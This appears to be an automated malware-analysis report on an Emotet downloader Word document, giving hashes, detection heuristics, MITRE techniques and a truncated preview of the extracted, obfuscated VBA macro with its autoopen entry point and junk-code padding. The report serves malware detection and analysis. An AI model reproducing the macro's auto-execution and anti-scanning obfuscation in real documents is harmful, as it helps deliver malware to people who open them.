Emotet Office (OLE) malware analysis — malicious · 9eb5dc9a514e0328

MALICIOUS

Office (OLE)

213.8 KB Created: 2019-04-17 12:38:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 58df25adb99c4d4e64d23f069b394b0d SHA-1: 9bccacd997c1475d2328bd278567a0bbceddd887 SHA-256: 9eb5dc9a514e032803096d8efe435a829fdc2b94d01d0fe871db4cb47193c744

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with a signature indicating it's an Emotet downloader. Critical heuristics indicate obfuscated API calls to 'Win32_Process' and an auto-executing macro ('autoopen') that uses GetObject, strongly suggesting the execution of malicious code. The VBA macro's structure and the presence of obfuscation techniques are characteristic of Emotet's downloader functionality, which typically involves fetching and executing additional stages.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-6944694-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6944694-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31306 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31306 bytes
SHA-256: `0b825be6e3a7b8395f820dffcde5ca530167740536da66ee02648f6352573814`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GUowxw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "i_CAAXAA" Attribute VB_Base = "0{E0B61789-8FB0-4859-BA02-4FDAB805CFF1}{C8D6B9CF-BFFA-401C-A39A-B022830F0F3A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "ZAGkAAQ" Attribute VB_Base = "0{8CF91DFC-5EF2-400F-979B-2378B955DEC8}{BFB07D59-98F4-44B0-B34B-984365C16FB6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "w_kAACk" Sub autoopen() If PAAAXwXx = sDACAQ1 Then dZAUcU = 565861361 * hAAZoA1B ElseIf tCBBUAU = oABG4GG1 Then Set v_AA1UU = Z4GABAG ElseIf iQA4BBk_ = hAXkAkA Then f1_GQx = EXxxCQ / rUAoQXA * YB1ZQA + Sqr(WQGwoQB) ElseIf C1AAUAZZ = m1AAZk4A Then iAAQBZx = 16884796 End If If NCZACDU_ = o4Q1k_Xx Then fxoABo = 991396442 * rUwUokUA ElseIf sBZADAZB = rAAUAD Then Set iDAkAU = dAoAUAc ElseIf lDDAAA = HACAAAQ Then DoQAZABA = k1QxACU / HAB1AB * UDQBDAAQ + Sqr(OX1QAAA) ElseIf TAx1Uk = WwBxA4AX Then mDxAAAQD = 731891826 End If TQAAUU If RA1Axc = H_GoUBZ Then HAxZBZZU = 24950626 * fDQQQkA ElseIf lo41wAUA = PAAAAx Then Set aAA4cXA = jkD4AAAc ElseIf lAXD4cU = SDZQB_A Then GoUUAB = TUAcX1xB / PAwA1AQ * I4QAwDAB + Sqr(RBDAA4) ElseIf SAQZcA = wCZ4ABc Then IBBCA1_ = 638403160 End If If QBZGxQUX = I1oA_oCw Then oAAQUQcD = 859712332 * dBABAA ElseIf BABUAAA1 = P4BAAk Then Set wCwAAA4G = jDAAXQc ElseIf EAZGZQDB = aQAA4D Then LAZDAA4 = M_U1ADAA / PAxwQkZ * X1AAAAQB + Sqr(oAAAAoDA) ElseIf UxAX4_U = lcAAAwQ Then zwAQUAAU = 248777835 End If If jAGABA = UBA1C44A Then qXwkACc = 590564566 * nAGAAAA ElseIf vBoQDQ = PAxcC4 Then Set iDB1UA = icQAAA ElseIf KZAxCA = WoGCDGA Then NcGBkB_1 = FcADAA / WUCkACXB * QwAXQX_G + Sqr(EAAUUw) ElseIf jQAQwoU = GAUGAAUc Then ww4oco = 530200646 End If End Sub Attribute VB_Name = "wAUAAAX" Function TQAAUU() On Error Resume Next If Sk4BxA = LUcABCD Then cAAXAZkA = 730702975 * jABAcxXC ElseIf u_GQQAAo = iGAXZAA Then Set aQ1UAAB = qQAAAA ElseIf wGDB1AC = wADwBk Then AA4DQA = dAAUwAUQ / NoDXBD_ * iQxAAAAA + Sqr(ZXxkAA) ElseIf KxAXBADB = pAA4DG Then cAAAAAAZ = 425581763 End If If W4QXABox = ZXBAABAZ Then hQwxAX = 800862908 * rkDAAA ElseIf RAC_QC = wABAwBA Then Set EADQBk = zBAkxAo_ ElseIf dCBoBAAU = TA11Dk Then LDZAXBQ = MCAUAQA / ZwAAAA * aXAZQok + Sqr(RAAQck) ElseIf V_4Zw1QA = fAAwA4A Then Fo_AwwA = 198761607 End If If 2251 < 75720 Then XGUDBBZ = vbFalse If kAGQkwo = bGx_AQ Then coDkAQQ = 323844 * VQwCAAA ElseIf PA1wAAA = t4BBAxU_ Then Set hAAQCQ = vBDBXACx ElseIf iXDADA = dBAXwBG Then QADDAU = fD1UxoAZ / cCUADUUw * lAZoAQ + Sqr(IAwZQDAA) ElseIf cGAUQA = uUQCCw Then JAoUA_wo = 329878278 End If If HABABBGD = fQBAAC Then qAXAX_A = 137232580 * FQkA_Uw4 ElseIf BcQZABCQ = S_c1xA4 Then Set FXABoAD = P_UAAA4 ElseIf jQ4QD1Z = oAABQAA Then iAAwoZ4 = G4ADUXU / rBAADAAB * mGZ4AA + Sqr(s_ADAoCD) ElseIf jDDABk = oAQw4A Then nGAxAQU = 519921364 End If If pcUQDBAD = wZwXQAU Then QAAAAAkA = 340000337 * LZAUQDAk ElseIf DAAoAkx = dAAUCZ Then Set t4CC_QXk = qUAo4ZA ElseIf UXGADk = fBQDAA Then aAQ4ZAQG = FoGBAA / nAwAoA * fBUAoQGc + Sqr(mGUAAck) ElseIf VDAUAU = lGUAAAQ_ Then RADwGZUU = 23452286 End If End If If kQAAAoB4 = kAU4Uc4U Then kQAoAAQ = 916715594 * kACkUA ElseIf wxDQUAcA = Gx_xAU Then Set aXZQDG = CAQAA_ ElseIf YwDABCoA = p ... (truncated)

SHA-256: 0b825be6e3a7b8395f820dffcde5ca530167740536da66ee02648f6352573814

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GUowxw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "i_CAAXAA"
Attribute VB_Base = "0{E0B61789-8FB0-4859-BA02-4FDAB805CFF1}{C8D6B9CF-BFFA-401C-A39A-B022830F0F3A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ZAGkAAQ"
Attribute VB_Base = "0{8CF91DFC-5EF2-400F-979B-2378B955DEC8}{BFB07D59-98F4-44B0-B34B-984365C16FB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w_kAACk"
Sub autoopen()
   If PAAAXwXx = sDACAQ1 Then
    dZAUcU = 565861361 * hAAZoA1B
  ElseIf tCBBUAU = oABG4GG1 Then
    Set v_AA1UU = Z4GABAG
  ElseIf iQA4BBk_ = hAXkAkA Then
   f1_GQx = EXxxCQ / rUAoQXA * YB1ZQA + Sqr(WQGwoQB)
  ElseIf C1AAUAZZ = m1AAZk4A Then
   iAAQBZx = 16884796
End If
   If NCZACDU_ = o4Q1k_Xx Then
    fxoABo = 991396442 * rUwUokUA
  ElseIf sBZADAZB = rAAUAD Then
    Set iDAkAU = dAoAUAc
  ElseIf lDDAAA = HACAAAQ Then
   DoQAZABA = k1QxACU / HAB1AB * UDQBDAAQ + Sqr(OX1QAAA)
  ElseIf TAx1Uk = WwBxA4AX Then
   mDxAAAQD = 731891826
End If
TQAAUU
   If RA1Axc = H_GoUBZ Then
    HAxZBZZU = 24950626 * fDQQQkA
  ElseIf lo41wAUA = PAAAAx Then
    Set aAA4cXA = jkD4AAAc
  ElseIf lAXD4cU = SDZQB_A Then
   GoUUAB = TUAcX1xB / PAwA1AQ * I4QAwDAB + Sqr(RBDAA4)
  ElseIf SAQZcA = wCZ4ABc Then
   IBBCA1_ = 638403160
End If
   If QBZGxQUX = I1oA_oCw Then
    oAAQUQcD = 859712332 * dBABAA
  ElseIf BABUAAA1 = P4BAAk Then
    Set wCwAAA4G = jDAAXQc
  ElseIf EAZGZQDB = aQAA4D Then
   LAZDAA4 = M_U1ADAA / PAxwQkZ * X1AAAAQB + Sqr(oAAAAoDA)
  ElseIf UxAX4_U = lcAAAwQ Then
   zwAQUAAU = 248777835
End If
   If jAGABA = UBA1C44A Then
    qXwkACc = 590564566 * nAGAAAA
  ElseIf vBoQDQ = PAxcC4 Then
    Set iDB1UA = icQAAA
  ElseIf KZAxCA = WoGCDGA Then
   NcGBkB_1 = FcADAA / WUCkACXB * QwAXQX_G + Sqr(EAAUUw)
  ElseIf jQAQwoU = GAUGAAUc Then
   ww4oco = 530200646
End If
End Sub

Attribute VB_Name = "wAUAAAX"
Function TQAAUU()
On Error Resume Next
   If Sk4BxA = LUcABCD Then
    cAAXAZkA = 730702975 * jABAcxXC
  ElseIf u_GQQAAo = iGAXZAA Then
    Set aQ1UAAB = qQAAAA
  ElseIf wGDB1AC = wADwBk Then
   AA4DQA = dAAUwAUQ / NoDXBD_ * iQxAAAAA + Sqr(ZXxkAA)
  ElseIf KxAXBADB = pAA4DG Then
   cAAAAAAZ = 425581763
End If
   If W4QXABox = ZXBAABAZ Then
    hQwxAX = 800862908 * rkDAAA
  ElseIf RAC_QC = wABAwBA Then
    Set EADQBk = zBAkxAo_
  ElseIf dCBoBAAU = TA11Dk Then
   LDZAXBQ = MCAUAQA / ZwAAAA * aXAZQok + Sqr(RAAQck)
  ElseIf V_4Zw1QA = fAAwA4A Then
   Fo_AwwA = 198761607
End If
If 2251 < 75720 Then
XGUDBBZ = vbFalse
   If kAGQkwo = bGx_AQ Then
    coDkAQQ = 323844 * VQwCAAA
  ElseIf PA1wAAA = t4BBAxU_ Then
    Set hAAQCQ = vBDBXACx
  ElseIf iXDADA = dBAXwBG Then
   QADDAU = fD1UxoAZ / cCUADUUw * lAZoAQ + Sqr(IAwZQDAA)
  ElseIf cGAUQA = uUQCCw Then
   JAoUA_wo = 329878278
End If
   If HABABBGD = fQBAAC Then
    qAXAX_A = 137232580 * FQkA_Uw4
  ElseIf BcQZABCQ = S_c1xA4 Then
    Set FXABoAD = P_UAAA4
  ElseIf jQ4QD1Z = oAABQAA Then
   iAAwoZ4 = G4ADUXU / rBAADAAB * mGZ4AA + Sqr(s_ADAoCD)
  ElseIf jDDABk = oAQw4A Then
   nGAxAQU = 519921364
End If
   If pcUQDBAD = wZwXQAU Then
    QAAAAAkA = 340000337 * LZAUQDAk
  ElseIf DAAoAkx = dAAUCZ Then
    Set t4CC_QXk = qUAo4ZA
  ElseIf UXGADk = fBQDAA Then
   aAQ4ZAQG = FoGBAA / nAwAoA * fBUAoQGc + Sqr(mGUAAck)
  ElseIf VDAUAU = lGUAAAQ_ Then
   RADwGZUU = 23452286
End If
End If
   If kQAAAoB4 = kAU4Uc4U Then
    kQAoAAQ = 916715594 * kACkUA
  ElseIf wxDQUAcA = Gx_xAU Then
    Set aXZQDG = CAQAA_
  ElseIf YwDABCoA = p
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.